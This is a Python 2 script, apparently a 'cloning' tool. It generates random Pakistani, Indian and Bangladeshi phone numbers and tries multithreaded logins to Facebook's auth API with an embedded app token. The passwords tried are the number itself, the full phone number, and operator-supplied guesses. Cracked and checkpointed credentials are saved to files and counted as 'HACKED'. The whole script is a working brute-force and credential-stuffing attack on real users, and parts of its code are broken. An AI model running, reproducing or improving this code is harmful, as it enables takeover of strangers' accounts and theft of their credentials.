import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 P-i-B')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/96.0.0.45.70;FBBV/60548545;FBDV/iPhone7,2;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/E-Plus;FBID/phone;FBLC/de_DE;FBOP/5;FBRV/0')]
def somi():
	print "\x1b[1;91mExit"
	os.sys.exit()
	
def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')

def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)
    

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)
def tik():
    titik = [
     '   ', '.  ', '.. ', '...', '.. ', '.  ', '   ']
    for o in titik:
        print '\r\x1b[1;91m     [\xe2\x97\x8f] \x1b[1;92mW\x1b[1;93ma\x1b[1;95mi\x1b[1;96mt\x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.5)
def exxb():
    print '[!] \x1b[1;91m MOST WELL \x1b[3;92;40m COME\x1b[1;95m SO\x1b[1;97mMI \x1b[1;91m\x1b[0;34;40m'
    os.sys.clear()        
back = 0
oks = []
id = []
cpb = []
idpublic = []
hpfromfriends = []
reaksi = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
banner = """
\033[1;91m  _______   _______   ___ ___   ___ 
\033[1;91m |   _   | |   _   | |   Y   | |   |
\033[1;31m |   1___| |.  |   | |.      | |.  |
\033[1;31m |____   | |.  |   | |. \_/  | |.  |
 \033[1;90m|:  1   | |:  1   | |:  |   | |:  |
\033[1;90m |::.. . | |::.. . | |::.|:. | |::.|
\033[1;90m `-------' `-------' `--- ---' `---'
"""
banner1 = """

\033[4;97mMOBILINK/JAZZ CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m00, 01, 02, 03, 04,
\033[1;91m[\xe2\x97\x8f]\033[1;93m05, 06, 07, 08, 09,
\033[4;97mTELINORE CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m40, 41, 42, 43, 44,
\033[1;91m[\xe2\x97\x8f]\033[1;93m45, 46, 47 ,48 ,49,
\033[4;97mWARID CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m20, 21, 22, 23,
\033[1;91m[\xe2\x97\x8f]\033[1;93m24, ??, ??, ??,
\033[4;97mUFONE CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m31, 32, 33, 34,
\033[1;91m[\xe2\x97\x8f]\033[1;93m35, 36, 37, ??,
\033[4;97mZONG CODE HERE\033[1;0m
\033[1;91m[\xe2\x97\x8f]\033[1;96m10, 11, 12, 13,
\033[1;91m[\xe2\x97\x8f]\033[1;93m14, 15, 16, 17,

"""
banner2 = """

\033[1;97mBANGLADESH CLONING CODE
\033[1;95m\033[1;92m170,171,172,173,174,
\033[1;95m\033[1;96m175,165,191, 192, 193, 
\033[1;95m\033[1;93m194, 195, 196, 197, 198, 
\033[1;95m\033[1;94m199,176,177,178,179

"""
banner3 = """
\033[1;97mINDIANCLONING CODE
\033[1;95m\033[1;96m905,975,755,855,954, 897, 967
\033[1;95m\033[1;94m937, 700, 727, 965, 786, 874, 856, 
\033[1;95m\033[1;92m566, 590, 527, 568, 578
"""
##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def Awan():
    os.system('clear')
    print banner
    
    print '\033[1;97mENTER\033[1;91m> \033[1;92mpak \033[1;97mTHEN CLONE PAKISTAN ACCOUNT '
    print '\033[1;97mENTER\033[1;91m> \033[1;92mindia \033[1;97mTHEN CLONE INDIAN ACCOUNT '
    print '\033[1;97mENTER\033[1;91m> \033[1;92mbangla \033[1;97mTHEN CLONE bangla ACCOUNT '
	action()
def action():
    star = raw_input('\n\n \x1b[1;96m>   ')
    if star == '':
        print '[!] Fill in correctly'
        action()
    elif star == 'pak':
        os.system("clear")
        print banner
        print banner1
        try:
            c = raw_input("\033[1;97m>  ")
            k= '+923'
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            somi()
    elif star == 'bangla':
        os.system("clear")
        print banner
        print banner2
        try:
            c = raw_input("\033[1;97m>  ")
            k= '+880'
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            somi()
    elif star == 'india':
    	os.system("clear")
        print banner
        print banner3
        try:
            c = raw_input("\033[1;97m>  ")
            k= '+91'
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            somi()
    elif star =='0':
        login()
    else:
        print '[!] WARNING STAR BOY'
        action()
    print 47* '\033[1;97m='
    somi = raw_input('\033[1;93mENTER PASSWORD 1 : ')
    somii = raw_input('\033[1;93mENTER PASSWORD 2 : ')
    somiii = raw_input('\033[1;93mENTER PASSWORD 3 : ')
    print 47* '\033[1;97m='
    xxx = str(len(id))
    psb('\033[1;97m[\033[1;93m+\033[1;97m] \033[1;96mTOTAL ACCOUNT NUMBERS: ' + xxx)
    time.sleep(0.5)
    psb('\033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]\033[1;91m PLEASE WAIT, PROCESS IS START..')
    time.sleep(0.5)
    psb('\033[1;97m[\033[1;91m!\033[1;97m] \033[1;92mTO STOP THIS PROCESS PRESS Ctrl THEN z')
    time.sleep(0.5)
    print 47* '\033[1;97m='
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Open \x1b[1;96mNow  )  ' + k + c + user + ' → ' + pass1                                       
                okb = open('save/successfull.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;92m(Aftar \x1b[1;91m7days) ' + k + c + user + ' → ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user +  ' → ' + pass2
                        okb = open('save/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;92m(Aftar \x1b[1;91m7days) ' + k + c + user + ' → ' + pass2
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3= somi
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user + ' → '+ pass3
                                okb = open('save/successfull.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;92m(Aftar \x1b[1;91m7days) ' + k + c + user + ' → ' + pass3 
                                    cps = open('save/checkpoint.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                else:
                                    pass4=somii
                                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user + ' → ' + pass4 
                                        okb = open('save/successfull.txt', 'a')
                                        okb.write(k+c+user+pass4+'\n')
                                        okb.close()
                                        oks.append(c+user+pass4)
                                    else:
                                        if 'www.facebook.com' in q['error_msg']:
                                            print '\033[1;92m(Aftar \x1b[1;91m7days) ' + k + c + user + ' → ' + pass4
                                            cps = open('save/checkpoint.txt', 'a')
                                            cps.write(k+c+user+pass4+'\n')
                                            cps.close()
                                            cpb.append(c+user+pass4)
                                        else:
                                            pass5=somiii
                                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;93m(Open \x1b[1;96mNow)  ' + k + c + user + ' → ' + pass5
                                                okb = open('save/successfull.txt', 'a')
                                                okb.write(k+c+user+pass5+'\n')
                                                okb.close()
                                                oks.append(c+user+pass5)
                                            else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                    print '\033[1;92m(Aftar \x1b[1;91m7days) ' + k + c + user + ' → ' + pass5 
                                                    cps = open('save/checkpoint.txt', 'a')
                                                    cps.write(k+c+user+pass5+'\n')
                                                    cps.close()
                                                    cpb.append(c+user+pass5)
                                                                                                                  
                                                                                                                                                                                                            
        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    print ''
    print """
    """
    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    ssomi() 
          
if __name__ == '__main__':
    Awan()


                                    

